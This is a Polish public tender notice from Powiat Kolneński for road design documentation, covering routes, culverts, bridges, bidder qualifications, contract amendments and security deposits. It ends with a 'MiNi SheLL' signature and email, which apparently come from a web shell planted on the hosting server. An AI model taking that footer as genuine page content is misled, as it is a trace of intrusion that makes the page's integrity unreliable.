Nawierzchnia zjazdów:<br/>- istniejących skrzyżowań z innymi drogami beton asfaltowy, <br/>- zjazdów na posesje – kostka betonowa gr. 8 cm;<br/>- zjazdów na pola – żwirowe<br/>11.	Kanał technologiczny z częścią przedmiarowo-kosztorysową i SST lub uzyskanie przez projektanta zwolnienia ministra właściwego ds. informatyzacji (Minister Cyfryzacji) z obowiązku budowy kanału technologicznego w trakcie trwania umowy.<br/>12.	Należy przewidzieć wymianę przepustów pod koroną drogi będących w niezadowalającym stanie technicznym <br/>a)	w km 0+310 prosty płytowy, żelbetowy, posadowiony bezpośrednio na gruncie, wlot i wylot umocniony darniną, światło poziome 1,10 m, światło pionowe 0,40 m, długość po osi cieku 10 m;<br/>b)	w km 0+500 prosty, ramowy, żelbetowy, posadowiony na fundamencie z betonu, światło poziome 1 m, światło pionowe 1 m, długość po osi cieku 10 m;<br/>c)	w km 1+200 prosty płytowy, żelbetowy, posadowiony bezpośrednio na gruncie, światło poziome 1,10 m, światło pionowe 0,40 m, długość po osi cieku 10 m;<br/>d)	w km 1+500 prosty, ramowy, żelbetowy, posadowiony na fundamencie z betonu, światło poziome 1 m, światło pionowe 1 m, długość po osi cieku 10 m;<br/>e)	w km 2+700 prosty, z prefabrykowanych rur żelbetowych, posadowiony na fundamencie z pospółki, ścianki czołowe betonowe wlot i wylot umocniony brukiem, światło poziome 0,8 m, światło pionowe 0,8 m, długość po osi cieku 10 m;<br/>f)	w km 4+300 prosty, z prefabrykowanych rur betowych, posadowiony na gruncie, ścianki czołowe betonowe proste, wlot i wylot umocniony darniną,<br/>światło poziome 0,6 m, światło pionowe 0,6 m, długość po osi cieku 10,6 m;<br/>g)	w km 4+800 prosty, z prefabrykowanych rur żelbetowych, posadowiony na fundamencie z pospółki, ścianki czołowe betonowe wlot i wylot umocniony brukiem,<br/>światło poziome 1 m, światło pionowe 1 m, długość po osi cieku 7,3 m;<br/>h)	w km 5+000 prosty, z prefabrykowanych rur żelbetowych, posadowiony na fundamencie z pospółki, ścianki czołowe betonowe wlot i wylot umocniony brukiem,<br/>światło poziome 0,8 m, światło pionowe 0,8 m, długość po osi cieku 7,0 m;<br/>i)	Ponadto należy uwzględnić do wymiany niezinwentaryzowane istniejące przepusty.<br/>13.	W km 4+450 obiekt mostowy JNI 01015570 nad rzeka Skroda, z betonu zbrojonego, długość obiektu 10,80 m<br/>Wg zaleceń kontrolnych konieczne jest: -udrożnienie kratek ściekowych, -zabezpieczenie antykorozyjne z naprawą ubytków betonu belek pod poręczowych i gzymsów oraz nawierzchni chodników i krawężników; -wymiana nawierzchni jezdni i dojazdów w obrębie skrzydeł.<br/>14.	Zapewnienie odwodnienia jezdni (powierzchniowo lub poprzez budowę kanalizacji deszczowej), wraz z kompletnym rozwiązaniem odprowadzenia i zagospodarowania wód opadowych i roztopowych do odbiornika usytuowanego w projektowanym pasie drogowym lub poza nim;<br/>15.	W przypadku stwierdzenia na projektowanym odcinku kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w planowanych liniach rozgraniczających teren inwestycji. <br/>16.	W sytuacji wystąpienia kolizji z istniejącym drzewostanem należy dokonać inwentaryzacji zieleni, uzyskać zgody właściwego organu na wycinkę a w przypadku konieczności wykonania odsadzeń sporządzenia planu nasadzeń.<br/>17.	Uzyskanie decyzji zatwierdzającej Projekt budowlany i udzielającej pozwolenia na budowę lub zaświadczenie o braku podstaw do wniesienia sprzeciwu do zgłoszenia robót budowlanych<br/>18.	Termin opracowania dokumentacji: w terminie 12 miesięcy od dnia podpisania umowy.<br/><br/>*Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowania dokumentacji przez projektanta mają wskazywać kilometraż rzeczywisty, który będzie miała odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na przebudowę dróg w Powiecie Kolneńskim. Zamawiający dokonuje podziału zamówienia na części:<br/>Część 4 – Zadanie nr 4:<br/>Opracowanie dokumentacji projektowej na przebudowę z rozbudową drogi powiatowej nr 1888B Turośl – Krusza – Charubin<br/>Stan projektowany: <br/>1.	Zakres opracowania* 0+000÷6+850;<br/>2.	Długość opracowania* – 6,85km;<br/>3.	Kategoria drogi- powiatowa;<br/>4.	Klasa drogi – Z;<br/>5.	Kategoria ruchu – KR2;<br/>6.	Działki istniejącego pasa drogowego: <br/>11/1, 14/5, 12, 14/1 obręb Turośl, <br/>9, 148/1, 145/1, 164/3, 164/4, 146/1, 147, 164/5, 165/1, 196/6, 155/1, 157/1, 160/1, 175/5, 175/3, 162/1, 161/1, 398, 260, 294, 324 obręb Krusza<br/>213, 504, 214, 295 obręb Charubin, <br/>Przebieg drogi dostępny na https://mapy.geoportal.gov.pl/.<br/>a)	Dodatkowo należy wykonać podział nw. działek i przeprowadzić w imieniu Zarządu Powiatu Kolneńskiego na podstawie art. 60, 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133 poz. 872 z późn.zm.) procedurę przejęcia nieruchomości zajęte pod drogi publiczne nw. działek:<br/>4/5, 13/2, 5, 14/21 obręb Turośl<br/>147/1, 146/6, 146/8, 146/7, 147/2, 407, 163/2, 163/1, 144, 145/3, 164/7, 164/9, 176, 161/1(w całości), 207/1, 208/1, 219/1, 218/1, 218/2, 266, 325/1, 326, 279, 327, 278, 348, 349/1, 211, 349/2, 352, 353 obręb Krusza<br/>208, 218, 217, 117, 296, 137, 294/1, 300 obręb Charubin<br/>Ilość działek 43 szt. (może ulec zmianie i należy ją zweryfikować)<br/>b)	W miejscach, gdzie nie będzie możliwości pozyskania nieruchomości procedurą na podstawie art. 60, 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, należy przewidzieć poszerzenie pasa drogowego na mocy Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U. z 2022 r. poz. 176) za wyjątkiem miejsc, gdzie zachodzi konieczność rozbiórki istniejących obiektów budowlanych lub ogrodzeń. <br/>c)	Ilości działek do podziału mogą ulec zmianie ze względu na przyjęte rozwiązania projektowe i zostanie rozliczona powykonawczo.<br/>7.	Jezdnia <br/>-szerokość jezdni zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie,<br/>- nawierzchnia jezdni – beton asfaltowy;<br/>8.	Chodniki w śladach istniejących <br/>Nawierzchnia chodnika – kostka betonowa grubość 6 cm;<br/>9.	Nawierzchnia zjazdów:<br/>- istniejących skrzyżowań z innymi drogami beton asfaltowy, <br/>- zjazdów na posesje – kostka betonowa gr. 8 cm;<br/>- zjazdów na pola – żwirowe<br/>10.	Kanał technologiczny z częścią przedmiarowo-kosztorysową i SST lub uzyskanie przez projektanta zwolnienia ministra właściwego ds. informatyzacji (Minister Cyfryzacji) z obowiązku budowy kanału technologicznego w trakcie trwania umowy.<br/>11.	Należy przewidzieć wymianę przepustów pod koroną drogi będących w niezadowalającym stanie technicznym. Zamawiający nie posiada inwentaryzacji istniejących przepustów.<br/>12.	W km 2+910 obiekt mostowy JNI 01015582 nad kanałem Serafin, wykonany z betonu zbrojonego. Belki żelbetowe typu „Gromnik”, długość obiektu 9,00 m<br/>Wg zaleceń kontrolnych konieczne jest: -zabezpieczenie antykorozyjne z naprawą ubytków betonu belek pod poręczowych i gzymsów oraz naprawa pęknięć wymiana nawierzchni jezdni i dojazdów w obrębie skrzydeł.<br/>13.	Zapewnienie odwodnienia jezdni (powierzchniowo lub poprzez budowę kanalizacji deszczowej), wraz z kompletnym rozwiązaniem odprowadzenia i zagospodarowania wód opadowych i roztopowych do odbiornika usytuowanego w projektowanym pasie drogowym lub poza nim;<br/>14.	W przypadku stwierdzenia na projektowanym odcinku kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w planowanych liniach rozgraniczających teren inwestycji. <br/>15.	W sytuacji wystąpienia kolizji z istniejącym drzewostanem należy dokonać inwentaryzacji zieleni, uzyskać zgody właściwego organu na wycinkę a w przypadku konieczności wykonania odsadzeń sporządzenia planu nasadzeń.<br/>18.	Termin opracowania dokumentacji: w terminie 18 miesięcy od dnia podpisania umowy.<br/><br/>*Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowania dokumentacji przez projektanta mają wskazywać kilometraż rzeczywisty, który będzie miała odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedną usługę polegającą na: <br/>opracowaniu Projektu Budowlanego dla budowy lub przebudowy lub rozbudowy drogi/dróg klasy min L, gdzie w ramach zadania uzyskano decyzję o zgodzie na realizację inwestycji drogowej /decyzję pozwolenia na budowę/ zgłoszenie robót budowlanych/ dokument równoważny, który umożliwił realizację robót budowlanych na podstawie opracowanej dokumentacji projektowej, w przypadku inwestycji wykonywanych poza obszarem RP. Przez wykonanie (zakończenie) należy rozumieć Protokół odbioru dokumentacji projektowej lub równoważny dokument;<br/>2) Wykonawca musi wskazać osoby, które zostaną skierowane przez Wykonawcę do realizacji zamówienia, legitymujące się kwalifikacjami zawodowymi, uprawnieniami, doświadczeniem, wykształceniem niezbędnym do wykonania zamówienia. <br/>Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które musi mieć dostępne na etapie realizacji zamówienia, spełniające następujące wymagania: <br/>Projektant branży drogowej:<br/>a) wymagana liczba osób: 1 <br/>b) wymagane kwalifikacje zawodowe i doświadczenie: <br/>1. Uprawnienia budowlane w specjalności drogowej do projektowania bez ograniczeń lub równoważne wydane na podstawie obowiązujących wcześniej przepisów; <br/>2. Posiada doświadczenie na stanowisku Projektanta branży drogowej lub Sprawdzającego dokumentację branży drogowej przy opracowaniu Projektu Budowlanego polegającego na budowie lub przebudowie lub rozbudowie drogi/dróg klasy min L, gdzie dla zadania uzyskano decyzję o zgodzie na realizację inwestycji drogowej/ decyzję pozwolenia na budowę/ zgłoszenie robót budowlanych/ dokument równoważny, który umożliwił realizację robót budowlanych na podstawie opracowanej dokumentacji projektowej, w przypadku inwestycji wykonywanej poza obszarem RP.<br/>W celu wykazania spełnienia warunków w zakresie zdolności technicznej lub zawodowej, w przypadku składania oferty na kilka zadań Wykonawca może wskazać tę samą osobę jako projektanta i może wykazać się wykonaniem co najmniej 1 zadania polegającego na opracowaniu dokumentacji projektowej zgodnie z postawionymi warunkami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia braku podstaw wykluczenia - oświadczenie wykonawcy (według wzoru stanowiącego Załącznik nr 8 do SWZ) o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – Załącznik nr 6 do SWZ.<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferty złożone wspólnie przez dwóch lub więcej Wykonawców będą musiały spełnić następujące wymagania:<br/>1) oferta będzie podpisana w taki sposób, aby wiązała prawnie wszystkich Wykonawców składających wspólnie ofertę;<br/>2) wszyscy Wykonawcy składający wspólnie ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;<br/>3) jeden z Wykonawców składających wspólnie ofertę zostanie ustanowiony jako pełnomocnik, upoważniony do reprezentowania wszystkich Wykonawców składających wspólnie ofertę w postępowaniu albo do reprezentowania wszystkich Wykonawców wspólnie składających ofertę w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy dołączyć pełnomocnictwo);<br/>4) dokumenty i oświadczenia Wykonawców składających wspólnie ofertę winny być złożone zgodnie z cz. XXII ust. 2 SWZ; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dla Części 1 i 3:<br/>1.	Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności z uwzględnieniem art. 455 ustawy w formie aneksu do umowy.<br/>2.	Istotne zmiany w umowie mogą dotyczyć:<br/>1)	zmiana terminu wykonania przedmiotu umowy, będącą następstwem działania organów administracji, w szczególności przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.: termin wykonania przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednaj niż o okres trwania tych okoliczności,<br/>2)	zmiana sposobu wykonania umowy w tym przypadku, gdy wystąpi konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa,<br/>3)	zmiana ceny wykonywanych usług w przypadku, jeżeli jest to konieczne i spowodowane wystąpieniem okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.<br/><br/>Dla Części 2 i 4:<br/>1.	Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności z uwzględnieniem art. 455 ustawy w formie aneksu do umowy.<br/>2.	Istotne zmiany w umowie mogą dotyczyć:<br/>1) zmiana terminu wykonania przedmiotu umowy, będącą następstwem działania organów administracji, w szczególności przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.: termin wykonania przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednaj niż o okres trwania tych okoliczności,<br/>2) zmiana sposobu wykonania umowy w tym przypadku, gdy wystąpi konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa,<br/>3) zmiana ceny wykonywanych usług w przypadku, jeżeli jest to konieczne i spowodowane wystąpieniem okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj.: wykonanie podziału działek w ilości innej, jak przewidziana w opisie przedmiotu zamówienia, wynikająca wyłącznie z potrzeb Zamawiającego w zakresie prawidłowego przygotowania inwestycji do realizacji.<br/>3.	W razie zmiany:<br/>a)	zmiana stawki podatku od towarów i usług (VAT). <br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę, każda ze Stron, w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się o przeprowadzenia negocjacji w sprawie odpowiedniej zmiany wynagrodzenia. Strona wnioskująca zobowiązana jest racjonalnie wykazać w jakim stopniu zaistniałe ww. zmiany mają wpływ na koszty wykonania zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem ePUAP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-23 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wysokość zabezpieczenia należytego wykonania umowy ustala się na 5% ceny całkowitej podanej w ofercie – na każde zadnie oddzielnie.<br/>2.	Zabezpieczenie może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wnosi przelewem na rachunek bankowy Zamawiającego nr 63 8754 0004 0000 4574 2000 0130. Zabezpieczenie wniesione w innej formie niż w pieniądzu należy złożyć w siedzibie Zamawiającego do dnia podpisania umowy. <br/>4.	Wykonawca ma obowiązek wnieść 100% kwoty zabezpieczenia najpóźniej w dniu podpisania umowy. Kwota wniesionego zabezpieczenia w wysokości 70% zostanie zwrócona w ciągu 30 dni od dnia wykonania zamówienia i uznania go przez Zamawiającego za należycie wykonane. Pozostała część (30%) zostanie zwolniona nie później niż w 15. dniu po upływie okresu rękojmi za wady lub gwarancji.

Creat By MiNi SheLL
Email: jattceo@gmail.com